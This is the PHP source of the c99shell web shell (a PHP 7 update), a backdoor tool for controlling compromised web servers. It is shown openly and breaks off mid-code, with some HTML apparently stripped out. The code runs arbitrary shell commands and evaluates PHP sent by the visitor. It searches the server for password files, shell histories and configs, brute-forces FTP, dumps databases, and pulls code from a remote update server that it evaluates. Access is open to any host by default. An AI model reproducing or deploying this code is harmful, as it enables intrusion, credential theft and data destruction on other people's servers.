SHELL

/____/ /____/ /_______ /|___| /\___ >____/____/ \_/ /\ \_______ \ /\ |___| \/ \/ \/ \/ \/ \/ \/ * c99shell.php v.2.1 (PHP 7) (1.12.2019) Updated by: KaizenLouie for PHP 7, and cermmik for MySQL * https://github.com/KaizenLouie/C99Shell-PHP7 * https://github.com/cermmik/C99-WebShell ************************************************************************************************************* */ if (!function_exists("getmicrotime")) { function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } } error_reporting(5); @ignore_user_abort(true); $win = strtolower(substr(PHP_OS, 0, 3)) == "win"; define("starttime", getmicrotime()); if (get_magic_quotes_gpc()) { if (!function_exists("strips")) { function strips(&$arr, $k = "") { if (is_array($arr)) { foreach ($arr as $k => $v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } } else { $arr = stripslashes($arr); } } } strips($GLOBALS); } $_REQUEST = array_merge($_COOKIE, $_GET, $_POST); foreach ($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } } $shver = "2.1 [PHP 7 Update] [1.12.2019]"; if (!empty($unset_surl)) { setcookie("c99sh_surl"); $surl = ""; } elseif (!empty($set_surl)) { $surl = $set_surl; setcookie("c99sh_surl", $surl); } else { $surl = $_REQUEST["c99sh_surl"]; } $surl_autofill_include = true; if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) { $include = "&"; foreach (explode("&", getenv("QUERY_STRING")) as $v) { $v = explode("=", $v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array( "http://", "https://", "ssl://", "ftp://", "\\\\" ) as $needle) { if (strpos($value, $needle) === 0) { $includestr .= urlencode($name) . "=" . urlencode($value) . "&"; } } } if ($_REQUEST["surl_autofill_include"]) { $includestr .= "surl_autofill_include=1&"; } } if (empty($surl)) { $surl = "?" . $includestr; } $surl = htmlspecialchars($surl); $timelimit = 0; $login = ""; $pass = ""; $md5_pass = ""; $host_allow = array( "*" ); $login_txt = "Restricted area"; $accessdeniedmess = "c99shell v." . $shver . ": access denied"; $gzipencode = true; $updatenow = false; $c99sh_updateurl = "https://github.com/KaizenLouie/C99Shell-PHP7/"; $c99sh_sourcesurl = "https://github.com/KaizenLouie/C99Shell-PHP7/"; $filestealth = true; $donated_html = "Owned by hacker"; $donated_act = array( "" ); $curdir = "./"; $tmpdir = ""; $tmpdir_log = "./"; $log_email = "user@host.tld"; $sort_default = "0a"; $sort_save = true; $ftypes = array( "html" => array( "html", "htm", "shtml" ) , "txt" => array( "txt", "conf", "bat", "sh", "js", "bak", "doc", "log", "sfc", "cfg", "htaccess" ) , "exe" => array( "sh", "install", "bat", "cmd" ) , "ini" => array( "ini", "inf" ) , "code" => array( "php", "phtml", "php3", "php4", "inc", "tcl", "h", "c", "cpp", "py", "cgi", "pl" ) , "img" => array( "gif", "png", "jpeg", "jfif", "jpg", "jpe", "bmp", "ico", "tif", "tiff", "avi", "mpg", "mpeg" ) , "sdb" => array( "sdb" ) , "phpsess" => array( "sess" ) , "download" => array( "exe", "com", "pif", "src", "lnk", "zip", "rar", "gz", "tar" ) ); $exeftypes = array( getenv("PHPRC") . " -q %f%" => array( "php", "php3", "php4" ) , "perl %f%" => array( "pl", "cgi" ) ); $regxp_highlight = array( array( basename($_SERVER["PHP_SELF"]) , 1, "", "" ) , array( "config.php", 1 ) ); $safemode_diskettes = array( "a" ); $hexdump_lines = 8; $hexdump_rows = 24; $nixpwdperpage = 100; $bindport_pass = "c99"; $bindport_port = "31373"; $bc_port = "31373"; $datapipe_localport = "8081"; if (!$win) { $cmdaliases = array( array( "-----------------------------------------------------------", "ls -la" ) , array( "find all suid files", "find / -type f -perm -04000 -ls" ) , array( "find suid files in current dir", "find . -type f -perm -04000 -ls" ) , array( "find all sgid files", "find / -type f -perm -02000 -ls" ) , array( "find sgid files in current dir", "find . -type f -perm -02000 -ls" ) , array( "find config.inc.php files", "find / -type f -name config.inc.php" ) , array( "find config* files", "find / -type f -name \"config*\"" ) , array( "find config* files in current dir", "find . -type f -name \"config*\"" ) , array( "find all writable folders and files", "find / -perm -2 -ls" ) , array( "find all writable folders and files in current dir", "find . -perm -2 -ls" ) , array( "find all service.pwd files", "find / -type f -name service.pwd" ) , array( "find service.pwd files in current dir", "find . -type f -name service.pwd" ) , array( "find all .htpasswd files", "find / -type f -name .htpasswd" ) , array( "find .htpasswd files in current dir", "find . -type f -name .htpasswd" ) , array( "find all .bash_history files", "find / -type f -name .bash_history" ) , array( "find .bash_history files in current dir", "find . -type f -name .bash_history" ) , array( "find all .fetchmailrc files", "find / -type f -name .fetchmailrc" ) , array( "find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc" ) , array( "list file attributes on a Linux second extended file system", "lsattr -va" ) , array( "show opened ports", "netstat -an | grep -i listen" ) ); } else { $cmdaliases = array( array( "-----------------------------------------------------------", "dir" ) , array( "show opened ports", "netstat -an" ) ); } $sess_cookie = "c99shvars"; $usefsbuff = true; $copy_unset = false; $quicklaunch = array( array( "", $surl ) , array( "", "#\" onclick=\"history.back(1)" ) , array( "", "#\" onclick=\"history.go(1)" ) , array( "", $surl . "act=ls&d=%upd&sort=%sort" ) , array( "", "" ) , array( "", $surl . "act=search&d=%d" ) , array( "", $surl . "act=fsbuff&d=%d" ) , array( "Encoder", $surl . "act=encoder&d=%d" ) , array( "Tools", $surl . "act=tools&d=%d" ) , array( "Proc.", $surl . "act=processes&d=%d" ) , array( "FTP brute", $surl . "act=ftpquickbrute&d=%d" ) , array( "Sec.", $surl . "act=security&d=%d" ) , array( "SQL", $surl . "act=sql&d=%d" ) , array( "PHP-code", $surl . "act=eval&d=%d" ) , array( "Update", $surl . "act=update&d=%d" ) , array( "Feedback", $surl . "act=feedback&d=%d" ) , array( "Self remove", $surl . "act=selfremove" ) , array( "Logout", "#\" onclick=\"if (confirm('Are you sure?')) window.close()" ) ); $highlight_background = "#c0c0c0"; $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; $highlight_string = "#000000"; @$f = $_REQUEST["f"]; @extract($_REQUEST["c99shcook"]); @set_time_limit(0); $tmp = array(); foreach ($host_allow as $k => $v) { $tmp[] = str_replace("\\*", ".*", preg_quote($v)); } $s = "!^(" . implode("|", $tmp) . ")$!i"; if (!preg_match($s, getenv("REMOTE_ADDR")) and !preg_match($s, gethostbyaddr(getenv("REMOTE_ADDR")))) { exit("c99shell: Access Denied - your host (" . getenv("REMOTE_ADDR") . ") not allow"); } if (!empty($login)) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if (empty($login_txt)) { $login_txt = strip_tags(preg_replace(" |
", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } if ($act != "img") { $lastdir = realpath("."); chdir($curdir); if ($selfwrite or $updatenow) { @ob_clean(); c99sh_getupdate($selfwrite, 1); exit; } $sess_data = unserialize($_COOKIE["$sess_cookie"]); if (!is_array($sess_data)) { $sess_data = array(); } if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); } if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); } $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ", "", $disablefunc); $disablefunc = explode(",", $disablefunc); } if (!function_exists("c99_buff_prepare")) { function c99_buff_prepare() { global $sess_data; global $act; foreach ($sess_data["copy"] as $k => $v) { $sess_data["copy"][$k] = str_replace("\\", DIRECTORY_SEPARATOR, realpath($v)); } foreach ($sess_data["cut"] as $k => $v) { $sess_data["cut"][$k] = str_replace("\\", DIRECTORY_SEPARATOR, realpath($v)); } $sess_data["copy"] = array_unique($sess_data["copy"]); $sess_data["cut"] = array_unique($sess_data["cut"]); sort($sess_data["copy"]); sort($sess_data["cut"]); if ($act != "copy") { foreach ($sess_data["cut"] as $k => $v) { if ($sess_data["copy"][$k] == $v) { unset($sess_data["copy"][$k]); } } } else { foreach ($sess_data["copy"] as $k => $v) { if ($sess_data["cut"][$k] == $v) { unset($sess_data["cut"][$k]); } } } } } c99_buff_prepare(); if (!function_exists("c99_sess_put")) { function c99_sess_put($data) { global $sess_cookie; global $sess_data; c99_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie, $data); } } foreach (array( "sort", "sql_sort" ) as $v) { if (!empty($_GET[$v])) { $$v = $_GET[$v]; } if (!empty($_POST[$v])) { $$v = $_POST[$v]; } } if ($sort_save) { if (!empty($sort)) { setcookie("sort", $sort); } if (!empty($sql_sort)) { setcookie("sql_sort", $sql_sort); } } if (!function_exists("str2mini")) { function str2mini($content, $len) { if (strlen($content) > $len) { $len = ceil($len / 2) - 2; return substr($content, 0, $len) . "..." . substr($content, -$len); } else { return $content; } } } if (!function_exists("view_size")) { function view_size($size) { if (!is_numeric($size)) { return false; } else { if ($size >= 1073741824) { $size = round($size / 1073741824 * 100) / 100 . " GB"; } elseif ($size >= 1048576) { $size = round($size / 1048576 * 100) / 100 . " MB"; } elseif ($size >= 1024) { $size = round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } } } if (!function_exists("fs_copy_dir")) { function fs_copy_dir($d, $t) { $d = str_replace("\\", DIRECTORY_SEPARATOR, $d); if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } $h = opendir($d); while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { if (!is_dir($d . DIRECTORY_SEPARATOR . $o)) { $ret = copy($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o); } else { $ret = mkdir($t . DIRECTORY_SEPARATOR . $o); fs_copy_dir($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o); } if (!$ret) { return $ret; } } } closedir($h); return true; } } if (!function_exists("fs_copy_obj")) { function fs_copy_obj($d, $t) { $d = str_replace("\\", DIRECTORY_SEPARATOR, $d); $t = str_replace("\\", DIRECTORY_SEPARATOR, $t); if (!is_dir(dirname($t))) { mkdir(dirname($t)); } if (is_dir($d)) { if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } if (substr($t, -1) != DIRECTORY_SEPARATOR) { $t .= DIRECTORY_SEPARATOR; } return fs_copy_dir($d, $t); } elseif (is_file($d)) { return copy($d, $t); } else { return false; } } } if (!function_exists("fs_move_dir")) { function fs_move_dir($d, $t) { $h = opendir($d); if (!is_dir($t)) { mkdir($t); } while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { $ret = true; if (!is_dir($d . DIRECTORY_SEPARATOR . $o)) { $ret = copy($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o); } else { if (mkdir($t . DIRECTORY_SEPARATOR . $o) and fs_copy_dir($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o)) { $ret = false; } } if (!$ret) { return $ret; } } } closedir($h); return true; } } if (!function_exists("fs_move_obj")) { function fs_move_obj($d, $t) { $d = str_replace("\\", DIRECTORY_SEPARATOR, $d); $t = str_replace("\\", DIRECTORY_SEPARATOR, $t); if (is_dir($d)) { if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } if (substr($t, -1) != DIRECTORY_SEPARATOR) { $t .= DIRECTORY_SEPARATOR; } return fs_move_dir($d, $t); } elseif (is_file($d)) { if (copy($d, $t)) { return unlink($d); } else { unlink($t); return false; } } else { return false; } } } if (!function_exists("fs_rmdir")) { function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { if (!is_dir($d . $o)) { unlink($d . $o); } else { fs_rmdir($d . $o . DIRECTORY_SEPARATOR); rmdir($d . $o); } } } closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists("fs_rmobj")) { function fs_rmobj($o) { $o = str_replace("\\", DIRECTORY_SEPARATOR, $o); if (is_dir($o)) { if (substr($o, -1) != DIRECTORY_SEPARATOR) { $o .= DIRECTORY_SEPARATOR; } return fs_rmdir($o); } elseif (is_file($o)) { return unlink($o); } else { return false; } } } if (!function_exists("myshellexec")) { function myshellexec($cmd) { global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !in_array("exec", $disablefunc)) { exec($cmd, $result); $result = join("\n", $result); } elseif (($result = `$cmd`) !== false) { } elseif (is_callable("system") and !in_array("system", $disablefunc)) { $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v; } elseif (is_callable("passthru") and !in_array("passthru", $disablefunc)) { $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v; } elseif (is_resource($fp = popen($cmd, "r"))) { $result = ""; while (!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } } return $result; } } if (!function_exists("tabsort")) { function tabsort($a, $b) { global $v; return strnatcmp($a[$v], $b[$v]); } } if (!function_exists("view_perms")) { function view_perms($mode) { if (($mode & 0xC000) === 0xC000) { $type = "s"; } elseif (($mode & 0x4000) === 0x4000) { $type = "d"; } elseif (($mode & 0xA000) === 0xA000) { $type = "l"; } elseif (($mode & 0x8000) === 0x8000) { $type = "-"; } elseif (($mode & 0x6000) === 0x6000) { $type = "b"; } elseif (($mode & 0x2000) === 0x2000) { $type = "c"; } elseif (($mode & 0x1000) === 0x1000) { $type = "p"; } else { $type = "?"; } $owner["read"] = ($mode & 00400) ? "r" : "-"; $owner["write"] = ($mode & 00200) ? "w" : "-"; $owner["execute"] = ($mode & 00100) ? "x" : "-"; $group["read"] = ($mode & 00040) ? "r" : "-"; $group["write"] = ($mode & 00020) ? "w" : "-"; $group["execute"] = ($mode & 00010) ? "x" : "-"; $world["read"] = ($mode & 00004) ? "r" : "-"; $world["write"] = ($mode & 00002) ? "w" : "-"; $world["execute"] = ($mode & 00001) ? "x" : "-"; if ($mode & 0x800) { $owner["execute"] = ($owner["execute"] == "x") ? "s" : "S"; } if ($mode & 0x400) { $group["execute"] = ($group["execute"] == "x") ? "s" : "S"; } if ($mode & 0x200) { $world["execute"] = ($world["execute"] == "x") ? "t" : "T"; } return $type . join("", $owner) . join("", $group) . join("", $world); } } if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid", $disablefunc)) { function posix_getpwuid($uid) { return false; } } if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid", $disablefunc)) { function posix_getgrgid($gid) { return false; } } if (!function_exists("posix_kill") and !in_array("posix_kill", $disablefunc)) { function posix_kill($gid) { return false; } } if (!function_exists("parse_perms")) { function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) { $t = "s"; } elseif (($mode & 0x4000) === 0x4000) { $t = "d"; } elseif (($mode & 0xA000) === 0xA000) { $t = "l"; } elseif (($mode & 0x8000) === 0x8000) { $t = "-"; } elseif (($mode & 0x6000) === 0x6000) { $t = "b"; } elseif (($mode & 0x2000) === 0x2000) { $t = "c"; } elseif (($mode & 0x1000) === 0x1000) { $t = "p"; } else { $t = "?"; } $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; return array( "t" => $t, "o" => $o, "g" => $g, "w" => $w ); } } if (!function_exists("parsesort")) { function parsesort($sort) { $one = intval($sort); $second = substr($sort, -1); if ($second != "d") { $second = "a"; } return array( $one, $second ); } } if (!function_exists("view_perms_color")) { function view_perms_color($o) { if (!is_readable($o)) { return "" . view_perms(fileperms($o)) . ""; } elseif (!is_writable($o)) { return "" . view_perms(fileperms($o)) . ""; } else { return "" . view_perms(fileperms($o)) . ""; } } } if (!function_exists("c99getsource")) { function c99getsource($fn) { global $c99sh_sourcesurl; $array = array( "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", "c99sh_bindport.c" => "c99sh_bindport_c.txt", "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", "c99sh_backconn.c" => "c99sh_backconn_c.txt", "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", ); $name = $array[$fn]; if ($name) { return file_get_contents($c99sh_sourcesurl . $name); } else { return false; } } } if (!function_exists("c99sh_getupdate")) { function c99sh_getupdate($update = true) { $url = $GLOBALS["c99sh_updateurl"] . "?version=" . urlencode(base64_encode($GLOBALS["shver"])) . "&updatenow=" . ($updatenow ? "1" : "0") . "&"; $data = @file_get_contents($url); if (!$data) { return "Can't connect to update-server!"; } else { $data = ltrim($data); $string = substr($data, 3, ord($data{2})); if ($data{0} == "\x99" and $data{1} == "\x01") { return "Error: " . $string; return false; } if ($data{0} == "\x99" and $data{1} == "\x02") { return "You are using latest version!"; } if ($data{0} == "\x99" and $data{1} == "\x03") { $string = explode("\x01", $string); if ($update) { $confvars = array(); $sourceurl = $string[0]; $source = file_get_contents($sourceurl); if (!$source) { return "Can't fetch update!"; } else { $fp = fopen(__FILE__, "w"); if (!$fp) { return "Local error: can't write update to " . __FILE__ . "! You may download c99shell.php manually here."; } else { fwrite($fp, $source); fclose($fp); return "Thanks! Updated with success."; } } } else { return "New version are available: " . $string[1]; } } elseif ($data{0} == "\x99" and $data{1} == "\x04") { eval($string); return 1; } else { return "Error in protocol: segmentation failed! (" . $data . ") "; } } } } if (!function_exists("mysqli_dump")) { function mysqli_dump($set) { global $shver; $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); $ret["err"] = array(); if (!is_resource($sock)) { echo ("Error: \$sock is not valid resource."); } if (empty($db)) { $db = "db"; } if (empty($print)) { $print = 0; } if (empty($nl2br)) { $nl2br = 0; } if (empty($add_drop)) { $add_drop = true; } if (empty($file)) { $file = $tmpdir . "dump_" . getenv("SERVER_NAME") . "_" . $db . "_" . date("d-m-Y-H-i-s") . ".sql"; } if (!is_array($tabs)) { $tabs = array(); } if (empty($add_drop)) { $add_drop = true; } if (sizeof($tabs) == 0) { $res = mysqli_query($sock, "SHOW TABLES FROM " . $db); if (mysqli_num_rows($res) > 0) { while ($row = mysqli_fetch_row($res)) { $tabs[] = $row[0]; } } } $out = "# Dumped by C99Shell.SQL v. " . $shver . " # Home page: https://github.com/KaizenLouie/C99Shell-PHP7 # # Host settings: # MySQL version: (" . mysqli_get_server_info() . ") running on " . getenv("SERVER_ADDR") . " (" . getenv("SERVER_NAME") . ")" . " # Date: " . date("d.m.Y H:i:s") . " # DB: \"" . $db . "\" #--------------------------------------------------------- "; $c = count($onlytabs); foreach ($tabs as $tab) { if ((in_array($tab, $onlytabs)) or (!$c)) { if ($add_drop) { $out .= "DROP TABLE IF EXISTS `" . $tab . "`;\n"; } $res = mysqli_query($sock, "SHOW CREATE TABLE `" . $tab . "`"); if (!$res) { $ret["err"][] = mysqli_smarterror($sock); } else { $row = mysqli_fetch_row($res); $out .= $row["1"] . ";\n\n"; $res = mysqli_query($sock, "SELECT * FROM `$tab`"); if (mysqli_num_rows($res) > 0) { while ($row = mysqli_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach ($values as $k => $v) { $values[$k] = addslashes($v); } $values = implode("', '", $values); $sql = "INSERT INTO `$tab`(`" . $keys . "`) VALUES ('" . $values . "');\n"; $out .= $sql; } } } } } $out .= "#---------------------------------------------------------------------------------\n\n"; if ($file) { $fp = fopen($file, "w"); if (!$fp) { $ret["err"][] = 2; } else { fwrite($fp, $out); fclose($fp); } } if ($print) { if ($nl2br) { echo nl2br($out); } else { echo $out; } } return $out; } } if (!function_exists("mysqli_buildwhere")) { function mysqli_buildwhere($array, $sep = " and", $functs = array()) { if (!is_array($array)) { $array = array(); } $result = ""; foreach ($array as $k => $v) { $value = ""; if (!empty($functs[$k])) { $value .= $functs[$k] . "("; } $value .= "'" . addslashes($v) . "'"; if (!empty($functs[$k])) { $value .= ")"; } $result .= "`" . $k . "` = " . $value . $sep; } $result = substr($result, 0, strlen($result) - strlen($sep)); return $result; } } if (!function_exists("mysqli_fetch_all")) { function mysqli_fetch_all($sock, $query) { if ($sock) { $result = mysqli_query($sock, $query); } else { $result = mysqli_query($query); } $array = array(); while ($row = mysqli_fetch_array($result)) { $array[] = $row; } mysqli_free_result($result); return $array; } } if (!function_exists("mysqli_field_name")) { function mysqli_field_name($result, $field_offset) { $properties = mysqli_fetch_field_direct($result, $field_offset); return is_object($properties) ? $properties->name : null; } } if (!function_exists("mysqli_smarterror")) { function mysqli_smarterror($sock) { if ($sock) { $error = mysqli_error($sock); } else { $error = mysqli_error(); } $error = htmlspecialchars($error); return $error; } } if (!function_exists("mysqli_query_form")) { function mysqli_query_form() { global $submit, $sql_act, $sql_query, $sql_query_result, $sql_confirm, $sql_query_error, $tbl_struct; if (($submit) and (!$sql_query_result) and ($sql_confirm)) { if (!$sql_query_error) { $sql_query_error = "Query was empty"; } echo "Error:
" . $sql_query_error . "
"; } if ($sql_query_result or (!$sql_confirm)) { $sql_act = $sql_goto; } if ((!$submit) or ($sql_act)) { echo ""; if ($tbl_struct) { echo "

"; if (($sql_query) and (!$submit)) { echo "Do you really want to"; } else { echo "SQL-Query"; } echo ": " . htmlspecialchars($sql_query) . "

Fields: "; foreach ($tbl_struct as $field) { $name = $field["Field"]; echo "» " . $name . " "; } echo "

"; } } if ($sql_query_result or (!$sql_confirm)) { $sql_query = $sql_last_query; } } } if (!function_exists("mysqli_create_db")) { function mysqli_create_db($sock = "", $db) { $sql = "CREATE DATABASE `" . addslashes($db) . "`;"; if ($sock) { return mysqli_query($sock, $sql); } else { return mysqli_query($sql); } } } if (!function_exists("mysqli_query_parse")) { function mysqli_query_parse($query) { $query = trim($query); $arr = explode(" ", $query); $types = array( "SELECT" => array( 3, 1 ) , "SHOW" => array( 2, 1 ) , "DELETE" => array( 1 ) , "DROP" => array( 1 ) ); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) { $result["propertions"] = $types[$op]; $result["query"] = $query; if ($types[$op] == 2) { foreach ($arr as $k => $v) { if (strtoupper($v) == "LIMIT") { $result["limit"] = $arr[$k + 1]; $result["limit"] = explode(",", $result["limit"]); if (count($result["limit"]) == 1) { $result["limit"] = array( 0, $result["limit"][0] ); } unset($arr[$k], $arr[$k + 1]); } } } } else { return false; } } } if (!function_exists("c99fsearch")) { function c99fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } $h = opendir($d); while (($f = readdir($h)) !== false) { if ($f != "." && $f != "..") { $bool = (empty($a["name_regexp"]) and strpos($f, $a["name"]) !== false) || ($a["name_regexp"] and preg_match($a["name"], $f)); if (is_dir($d . $f)) { $search_i_d++; if (empty($a["text"]) and $bool) { $found[] = $d . $f; $found_d++; } if (!is_link($d . $f)) { c99fsearch($d . $f); } } else { $search_i_f++; if ($bool) { if (!empty($a["text"])) { $r = @file_get_contents($d . $f); if ($a["text_wwo"]) { $a["text"] = " " . trim($a["text"]) . " "; } if (!$a["text_cs"]) { $a["text"] = strtolower($a["text"]); $r = strtolower($r); } if ($a["text_regexp"]) { $bool = preg_match($a["text"], $r); } else { $bool = strpos(" " . $r, $a["text"], 1); } if ($a["text_not"]) { $bool = !$bool; } if ($bool) { $found[] = $d . $f; $found_f++; } } else { $found[] = $d . $f; $found_f++; } } } } } closedir($h); } } if ($act == "gofile") { if (is_dir($f)) { $act = "ls"; $d = $f; } else { $act = "f"; $d = dirname($f); $f = basename($f); } } @ob_start(); @ob_implicit_flush(0); function onphpshutdown() { global $gzipencode, $ft; if (!headers_sent() and $gzipencode and !in_array($ft, array( "img", "download", "notepad" ))) { $v = @ob_get_contents(); @ob_end_clean(); @ob_start("ob_gzHandler"); echo $v; @ob_end_flush(); } } function c99shexit() { onphpshutdown(); exit; } header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); if (empty($tmpdir)) { $tmpdir = ini_get("upload_tmp_dir"); if (is_dir($tmpdir)) { $tmpdir = "/tmp/"; } } $tmpdir = realpath($tmpdir); $tmpdir = str_replace("\\", DIRECTORY_SEPARATOR, $tmpdir); if (substr($tmpdir, -1) != DIRECTORY_SEPARATOR) { $tmpdir .= DIRECTORY_SEPARATOR; } if (empty($tmpdir_logs)) { $tmpdir_logs = $tmpdir; } else { $tmpdir_logs = realpath($tmpdir_logs); } if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "ON (secure)"; } else { $safemode = false; $hsafemode = "OFF (not secure)"; } $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") { $openbasedir = true; $hopenbasedir = "" . $v . ""; } else { $openbasedir = false; $hopenbasedir = "OFF (not secure)"; } $sort = htmlspecialchars($sort); if (empty($sort)) { $sort = $sort_default; } $sort[1] = strtolower($sort[1]); $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); if (!preg_match("PHP/" . phpversion() , $DISP_SERVER_SOFTWARE)) { $DISP_SERVER_SOFTWARE .= ". PHP/" . phpversion(); } $DISP_SERVER_SOFTWARE = str_replace("PHP/" . phpversion() , "PHP/" . phpversion() . "", htmlspecialchars($DISP_SERVER_SOFTWARE)); @ini_set("highlight.bg", $highlight_bg); @ini_set("highlight.comment", $highlight_comment); @ini_set("highlight.default", $highlight_default); @ini_set("highlight.html", $highlight_html); @ini_set("highlight.keyword", $highlight_keyword); @ini_set("highlight.string", $highlight_string); if (!is_array($actbox)) { $actbox = array(); } $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?>

!C99Shell v.!

Software:   uname -a: ", 1); ?>  ", 1); } else { echo get_current_user(); } ?>  Safe-mode:  " . htmlspecialchars($b) . DIRECTORY_SEPARATOR . ""; $i++; } echo "   "; if (is_writable($d)) { $wd = true; $wdt = "[ ok ]"; echo "" . view_perms(fileperms($d)) . ""; } else { $wd = false; $wdt = "[ Read-Only ]"; echo "" . view_perms_color($d) . ""; } if (is_callable("disk_free_space")) { $free = disk_free_space($d); $total = disk_total_space($d); if ($free === false) { $free = 0; } if ($total === false) { $total = 0; } if ($free < 0) { $free = 0; } if ($total < 0) { $total = 0; } $used = $total - $free; $free_percent = round(100 / ($total / $free) , 2); echo " Free " . view_size($free) . " of " . view_size($total) . " (" . $free_percent . "%)"; } echo " "; $letters = ""; if ($win) { $v = explode("\\", $d); $v = $v[0]; foreach (range("a", "z") as $letter) { $bool = $isdiskette = in_array($letter, $safemode_diskettes); if (!$bool) { $bool = is_dir($letter . ":\\"); } if ($bool) { $letters .= "[ "; if ($letter . ":" != $v) { $letters .= $letter; } else { $letters .= "" . $letter . ""; } $letters .= " ] "; } } if (!empty($letters)) { echo "Detected drives: " . $letters . " "; } } if (count($quicklaunch) > 0) { foreach ($quicklaunch as $item) { $item[1] = str_replace("%d", urlencode($d) , $item[1]); $item[1] = str_replace("%sort", $sort, $item[1]); $v = realpath($d . ".."); if (empty($v)) { $a = explode(DIRECTORY_SEPARATOR, $d); unset($a[count($a) - 2]); $v = join(DIRECTORY_SEPARATOR, $a); } $item[1] = str_replace("%upd", urlencode($v) , $item[1]); echo "" . $item[0] . "    "; } } echo "

"; if ((!empty($donated_html)) and (in_array($act, $donated_act))) { echo "

" . $donated_html . "

"; } echo ""; $line = explode(" ", $line); $line[10] = join(" ", array_slice($line, 10)); $line = array_slice($line, 0, 11); if ($line[0] == get_current_user()) { $line[0] = "" . $line[0] . ""; } $line[] = "KILL"; $prcs[] = $line; echo ""; } } } else { while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } $ret = convert_cyr_string($ret, "d", "w"); $stack = explode("\n", $ret); unset($stack[0], $stack[2]); $stack = array_values($stack); $head = explode(" ", $stack[0]); $head[1] = explode(" ", $head[1]); $head[1] = $head[1][0]; $stack = array_slice($stack, 1); unset($head[2]); $head = array_values($head); if ($parsesort[1] != "a") { $y = ""; } else { $y = ""; } if ($k > count($head)) { $k = count($head) - 1; } for ($i = 0;$i < count($head);$i++) { if ($i != $k) { $head[$i] = "" . trim($head[$i]) . ""; } } $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo ""; $line = explode(" ", $line); $line[1] = 